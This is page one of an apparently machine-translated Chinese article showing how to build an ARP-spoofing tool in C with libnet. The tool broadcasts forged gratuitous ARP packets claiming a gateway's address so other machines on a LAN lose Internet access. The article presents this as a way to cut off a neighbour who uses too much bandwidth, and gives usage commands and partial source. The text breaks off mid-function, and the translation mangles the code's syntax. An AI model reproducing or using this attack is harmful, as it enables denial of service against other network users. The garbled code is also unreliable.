Article title: use libnet to implement cyber law enforcement on linux. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
In the old age of reading, there was a network software called "network law enforcement officer" on windows. I believe many of my friends have used it. I found that my website could not be opened because of who is in bt on the LAN, I directly told him that I am afraid I am offended. what should I do? open the cyber law enforcement officer and simply configure it so that he will not be able to access the Internet.
Of course, the current version of the cyber law enforcement officer has rich functions, but its principle is still the same as before. it uses arp spoofing to fill in the Gateway address to be forged, then the cyber law enforcement officer will broadcast free arp packets in the lan, and other machines will not be able to get out of the Internet. one sentence: very strong, very violent!
In Linux, arp frames need to be directly constructed. using other technologies, it is very complicated. using libnet, an open-source library, the core code can be completed in dozens of lines.
Most linux distributions and other unix systems have libnet. check if your system has the libnet-config command.
If not, you can download and install it on its home page:
Http://www.packetfactory.net/libnet
In addition, check whether your system has Version 1.1 or 1.0. The two versions of the API are very different. here we use the latest version 1.1. if not, please upgrade it.
Gcc garp. c-o garp-lnet
Run:
-H: view the command line,
-F specifies the output interface. If this parameter is not specified, an interface is selected,
-T specifies the sending interval of free arp packets. the default value is 5 seconds,
Example:
./Garp-f eth0 192.168.1.1 192.168.2.1
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Define MAX_IP_NUM 32
Static char * pname = "";
Static char * ifname = NULL;
Static struct in_addr ipaddrs [MAX_IP_NUM];
Static int timer = 5;
Static int
Get_hw_addr (char * dev, unsigned char macbuf [6])
{
Libnet_t * l;
Char errbuf [LIBNET_ERRBUF_SIZE] = "";
Struct libnet_ether_addr * mac;
L = libnet_init (LIBNET_LINK, dev, errbuf );
If (! L ){
Fprintf (stderr, "libnet_init: % s \ n", errbuf );
Return-1;
}
Mac = libnet_get_hwaddr (l );
If (! Mac ){
Fprintf (stderr, "libnet_get_hwaddr: % s \ n", libnet_geterror (l ));
Libnet_destroy (l );
Return-1;
}
Memcpy (macbuf, mac-> ether_addr_octet, 6 );
Libnet_destroy (l );
Return 0;
}
Static int
Send_garp (char * ifname, long ipaddr)
{
Unsigned char bcast_mac [6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
Unsigned char zero_mac [6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
Unsigned char mymac [6] = {0x00 };
Libnet_t * l;
Char errbuf [LIBNET_ERRBUF_SIZE] = "";
Int I, ret = 0;
If (get_hw_addr (ifname, mymac )! = 0 ){
Return-1;
}
L = libnet_init (LIBNET_LINK, ifname, errbuf );
If (! L ){
Fprintf (stderr, "libnet_init: % s \ n", errbuf );
Return-1;
}
For (I = 0; I <2; I ++ ){
If (libnet_build_arp (ARPHRD_ETHER,/* hardware address type */
ETHERTYPE_IP,/* protocol address type */
6,/* Hardware address length */
4,/* protocol address length */
(I = 0 )? ARPOP_REQUEST: ARPOP_REPLY,/* ARP operation type */
Mymac,/* sender Hardware address */
(Unsigned char *) & ipaddr,/* sender protocol address */
(I = 0 )? Zero_mac: mymac,/* target hardware address */
(Unsigned char *) & ipaddr,/* target protocol address */
NULL,/* Payload */
0,/* Length of payload */
L,/* libnet context pointer */
0/* packet id */
) =-1 ){
Fprintf (stderr, "libnet_build_arp: % s \ n", libnet_geterror (l ));
Ret =-1;
Break;
}
If (libnet_build_ethernet (bcast_mac, mymac, ETHERTYPE_ARP, NULL, 0,
L, 0) =-1 ){
Fprintf (stderr, "libnet_build_ethernet: % s \ n", libnet_geterror (l ));
Ret =-1;
Break;
}
[1] [2] Next page